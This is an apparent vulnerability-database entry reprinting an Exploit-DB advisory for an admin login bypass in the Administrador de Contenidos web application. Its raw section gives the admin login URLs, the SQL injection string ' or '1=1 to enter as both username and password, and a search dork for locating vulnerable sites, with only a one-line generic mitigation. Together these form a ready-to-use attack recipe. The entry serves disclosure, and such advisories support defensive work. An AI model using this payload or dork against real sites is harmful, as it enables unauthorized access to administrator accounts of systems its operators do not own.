Administrador de Contenidos Admin Login Bypass vulnerability

vendor:

Administrador de Contenidos

by:

Ra3cH

7,5

CVSS

HIGH

Admin Bypass

Not provided

CWE

Product Name: Administrador de Contenidos

Affected Version From: Not provided

Affected Version To: Not provided

Patch Exists: Not provided

Related CWE: Not provided

CPE: Not provided

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Not provided

Not provided

Administrador de Contenidos Admin Login Bypass vulnerability

An attacker can bypass the authentication process of the Administrador de Contenidos web application by entering ' or '1=1 as the username and password.

Mitigation:

Ensure that authentication processes are secure and cannot be bypassed.

Source

Exploit-DB raw data:

************************************************************

**      Administrador de Contenidos  Admin Login Bypass vulnerability

************************************************************

**  Prodcut:        Administrador de Contenidos   

**  Home   :         www.DZ4All.cOm/Cc

**  Vunlerability :        Admin Bypass

**  Risk  :        High

**  Dork :         "Diseño Web Hernest Consulting S.L."

************************************************************

** Discovred by:    Ra3cH

** From           :    Algeria

** Contact     :     e51@hotmail.fr

** *********************************************************

** Greetz to :     ALLAH 

**         All Members of  http://www.DZ4All.cOm/Cc

**          And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen 

************************************************************

**  Exploit:

**  http://[PATH]/admin    or     http://[PATH]/admin/Login.Asp

**

**  user :         ' or '1=1      

**  password :     ' or '1=1   

**  

************************************************************

************************************************************